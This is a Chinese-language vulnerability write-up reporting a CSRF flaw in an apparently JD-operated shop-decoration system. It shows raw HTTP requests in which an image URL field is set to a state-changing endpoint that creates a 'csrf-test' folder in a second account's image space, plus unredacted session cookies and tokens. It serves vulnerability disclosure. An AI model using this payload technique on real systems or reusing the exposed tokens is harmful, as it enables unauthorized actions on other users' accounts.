某东某系统存在 CSRF 漏洞。

adopi

某东某系统存在 CSRF 漏洞。
A 账号：

微信小程序-图片链接 url 可控：

1. POST /decoration/api/element/saveAndPublish HTTP/2
   
2. Host: xx.cn
   
3. Cookie: __jdv=113905493|goselling.com|-|referral|-|1685667852704;
   
4. 3AB9D23F7A4B3C9B=FIH6HCA4K25HNQKDQDC2TQWRTECH5S2VIAB3N47EMB3BAXCGEVY7EX63
   
5. PWYRXD6YOH4CG2GUYFJB7HA4RMUMWTOFT4;
   
6. mfs_lsy_sessionb=1B57ACBC44805946A768BDBBE22E6827;
   
7. mfs_lsy_pinb=lsy_38wYlgG2xqj2srM2Kj; tenantCode=selling2;
   
8. sp_lsy_session=C9CA7D12DC574BE689C704C5A4259027; sp_lsy_vd=13681143;
   
9. hi_belong=Z2YDMOOJEL6N27HUO6OS54X2SQUY5BKOKCPUGSDZPCGKLWF3KGQIO2POUGEAI7KX
   
10. TBSARQ253EX3EPC4KSBVGV3B2QOHNPTA3YSQXT5W5M5IOLYA4ND62HTND5BWQR73DT43COTL
    
11. HBJEJL26FYG3BNTSOXO23LDO7Q5LKC7ZJQ4XNYRXKODNH5PKLTBXTNUL2IT6EAVFQPYNKAT4LXA
    
12. GJEFQLSNG5HGVY6QRGQY; app_code=FEA37492D92D78FAC0C0AC66BEC37C39; shop_type=0;
    
13. mfs_user_role=1; mba_muid=1685667852703344777662; navigation=[%22*sl_RrFdTHe%22];
    
14. mba_sid=16856679524822945543355525546.19; __jda=216326275.1685667852703344777662.1685667853.1685667853.1685667853.1; __jdb=216326275.23.1685667852703344777662|1.1685667853; __jdc=216326275;
    
15. themeId=18595
    
16. Content-Length: 8315
    
17. Sgm-Context: 213108912045568420;213108912045568420
    
18. Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24" Sec-Ch-Ua-Mobile: ?0
    
19. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
    
20. Gecko) Chrome/113.0.0.0 Safari/537.36
    
21. Content-Type: application/json
    
22. Accept: application/json, text/plain, */* X-Requested-With: XMLHttpRequest
    
23. Sec-Ch-Ua-Platform: "macOS" Origin: https://xx.cn
    
24. Sec-Fetch-Site: same-origin
    
25. Sec-Fetch-Mode: cors
    
26. Sec-Fetch-Dest: empty
    
27. Referer: https://xx.cn/?elementId=144153&scope=1&hideMiddlePage=false
    
28. Accept-Encoding: gzip, deflate
    
29. Accept-Language: zh-CN,zh;q=0.9
    
30. {"channel":1,"platform":2,"source":1,"traceId":"DESIGN_ezdlul3v","scope":"1","elementType":nu
    
31. ll,"floorList":[{"version":"1.0.0","componentPubId":7,"elementId":144153,"floorId":"283125"},{"v
    
32. ersion":"1.0.0","componentPubId":8,"elementId":144153,"floorId":"283126"},{"version":"1.0.0", "componentPubId":4,"elementId":144153,"content":"{"searchText":" 请 输 入 搜 索 关 键 词
    
33. ","bgColor":"#ffffff","textColor":"#999999","searchColor":"#f4f4f4"}","floorId":"2831
    
34. 23"},{"version":"1.0.0","componentPubId":2,"elementId":144153,"content":"{"imageUrl":"htt
    
35. ps://upload-shop.selling.cn/api/imgcategory/doAdd?parentCateId=0&cateName=csrf-test&key=\ ","hotList":[],"editorImageHeight":3457,"imageHeight":"526.13"}","floorId":"283122"},{"v
    
36. ersion":"1.0.0","componentPubId":2,"elementId":144153,"content":"{"imageUrl":"//img14.36
    
37. 0buyimg.com/saasdecoration/jfs/t1/172081/30/11498/2409/60ae5dd2E06701229/17e3bcd8eae
    
38. 06c94.png","hotList":[],"editorImageHeight":180,"imageHeight":"60.00"}","floorId":"283
    
39. 124"},{"version":"1.0.0","componentPubId":3,"elementId":144153,"content":"{"colNumber":3, "backgroundColor":"#f4f4f4","productDetailType":1,"sl-skus":{"type":"auto","produc
    
40. tNum":6,"list":[],"listResult":[{"skuId":601899904,"skuName":"测试商品 3（系统自动
    
41. 创 建 ， 可 供 体 验 全 流 程 ）
    
42. ","originPrice":null,"realPrice":1,"productId":null,"skuStatus":"1","stockStatus":"33\ ","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jpg"
    
43. ,"productName":" 测 试 商 品 3 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
44. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
    
45. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899928,"
    
46. skuName":" 测 试 商 品 2 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
47. ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":" 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
    
48. g","productName":" 测 试 商 品 2 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
49. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
    
50. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":604975005,"
    
51. skuName":" 测 试 商 品 1 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
52. ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":" 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
    
53. g","productName":" 测 试 商 品 1 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
54. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
    
55. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899906,"
    
56. skuName":" 测 试 商 品 5 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
57. ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":" 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
    
58. g","productName":" 测 试 商 品 5 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
59. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
    
60. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":604975003,"
    
61. skuName":" 测 试 商 品 4 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
62. ","originPrice":null,"realPrice":2,"productId":null,"skuStatus":"1","stockStatus":"33\ ","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jpg"
    
63. ,"productName":" 测 试 商 品 4 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
64. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
    
65. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899930,"
    
66. skuName":" 测 试 商 品 6 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
67. \\">","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus
    
68. ":"33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37ba
    
69. b8.jpg","productName":" 测 试 商 品 6 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
70. \\">","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":
    
71. null,"purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels\ ":"[]","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null}]}}","floorId":"28311
    
72. 9"},{"version":"1.0.0","componentPubId":2,"elementId":144153,"content":"{"imageUrl":"//im
    
73. g14.360buyimg.com/saasdecoration/jfs/t1/127293/32/19284/3437/60ae5e0cEe3a32a72/1b07afaa63f15aaf.png","hotList":[],"editorImageHeight":180,"imageHeight":"60.00"}","floorId"
    
74. :"283121"},{"version":"1.0.0","componentPubId":3,"elementId":144153,"content":"{"colNumbe
    
75. r":2,"backgroundColor":"#f4f4f4","productDetailType":1,"sl-skus":{"type":"auto","p
    
76. roductNum":4,"list":[],"listResult":[{"skuId":601899904,"skuName":"测试商品 3（系统
    
77. 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
78. ","originPrice":null,"realPrice":1,"productId":null,"skuStatus":"1","stockStatus":"33\
    
79. 
    
80. ","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jpg"
    
81. ,"productName":" 测 试 商 品 3 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
82. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\
    
83. 
    
84. "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
    
85. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899928,"
    
86. skuName":" 测 试 商 品 2 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
87. ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":"
    
88. 
    
89. 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
    
90. g","productName":" 测 试 商 品 2 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
91. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\
    
92. 
    
93. "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
    
94. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":604975005,"
    
95. skuName":" 测 试 商 品 1 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
96. ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":"
    
97. 
    
98. 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
    
99. g","productName":" 测 试 商 品 1 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
    
100. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\
     
101. 
     
102. "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
     
103. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899906,"
     
104. skuName":" 测 试 商 品 5 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
     
105. ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":"
     
106. 
     
107. 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
     
108. g","productName":" 测 试 商 品 5 （ 系 统 自 动 创 建 ， 可 供 体 验 全 流 程 ）
     
109. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\
     
110. 
     
111. "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
     
112. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null}]}}","floorId":"283120"}],"
     
113. 
     
114. pageConfig":{"componentPubId":9,"version":"1.0.0","elementId":144153,"type":"1","content":"{
     
115. "titleText":" 好 物 旗 舰 店
     
116. ","isMessage":1,"isShare":1,"isShopInfo":1,"validated":true,"isAppShopNav":2}"},"ele
     
117. mentId":144153,"needPublish":1}

复制代码

数据包
content 参数里 imageUrl 可控


该 url，为图片空间中新建文件夹 csrf-poc

csrf-poc 数据包：

1. GET /api/imgcategory/doAdd?parentCateId=0&cateName=csrf-test&key= HTTP/2
   
2. Host: xx.cn
   
3. Cookie: __jdv=113905493|goselling.com|-|referral|-|1685667852704;
   
4. 3AB9D23F7A4B3C9B=FIH6HCA4K25HNQKDQDC2TQWRTECH5S2VIAB3N47EMB3BAXCGEVY7EX63
   
5. PWYRXD6YOH4CG2GUYFJB7HA4RMUMWTOFT4;
   
6. mfs_lsy_sessionb=1B57ACBC44805946A768BDBBE22E6827;
   
7. mfs_lsy_pinb=lsy_38wYlgG2xqj2srM2Kj; tenantCode=selling2;
   
8. sp_lsy_session=C9CA7D12DC574BE689C704C5A4259027; sp_lsy_vd=13681143;
   
9. hi_belong=Z2YDMOOJEL6N27HUO6OS54X2SQUY5BKOKCPUGSDZPCGKLWF3KGQIO2POUGEAI7KX
   
10. TBSARQ253EX3EPC4KSBVGV3B2QOHNPTA3YSQXT5W5M5IOLYA4ND62HTND5BWQR73DT43COTL
    
11. HBJEJL26FYG3BNTSOXO23LDO7Q5LKC7ZJQ4XNYRXKODNH5PKLTBXTNUL2IT6EAVFQPYNKAT4LXA
    
12. GJEFQLSNG5HGVY6QRGQY; app_code=FEA37492D92D78FAC0C0AC66BEC37C39; shop_type=0;
    
13. mfs_user_role=1; mba_muid=1685667852703344777662; navigation=[%22*sl_RrFdTHe%22];
    
14. themeId=18595; mba_sid=16856679524822945543355525546.42; __jda=178808869.1685667852703344777662.1685667853.1685667853.1685667853.1; __jdc=178808869; __jdb=178808869.29.1685667852703344777662|1.1685667853
    
15. Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24" Accept: application/json, text/javascript, */*; q=0.01
    
16. Sec-Ch-Ua-Mobile: ?0
    
17. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
    
18. Gecko) Chrome/113.0.0.0 Safari/537.36
    
19. Sec-Ch-Ua-Platform: "macOS" Origin: https://xx.cn
    
20. Sec-Fetch-Site: same-site
    
21. Sec-Fetch-Mode: cors
    
22. Sec-Fetch-Dest: empty
    
23. Referer: https://xx.cn/
    
24. Accept-Encoding: gzip, deflate
    
25. Accept-Language: zh-CN,zh;q=0.9

复制代码

复制链接，b 账号访问




再去看看 b 账号图片管理中是否多了一个 csrf-test 文件夹。如果有则存在该漏洞。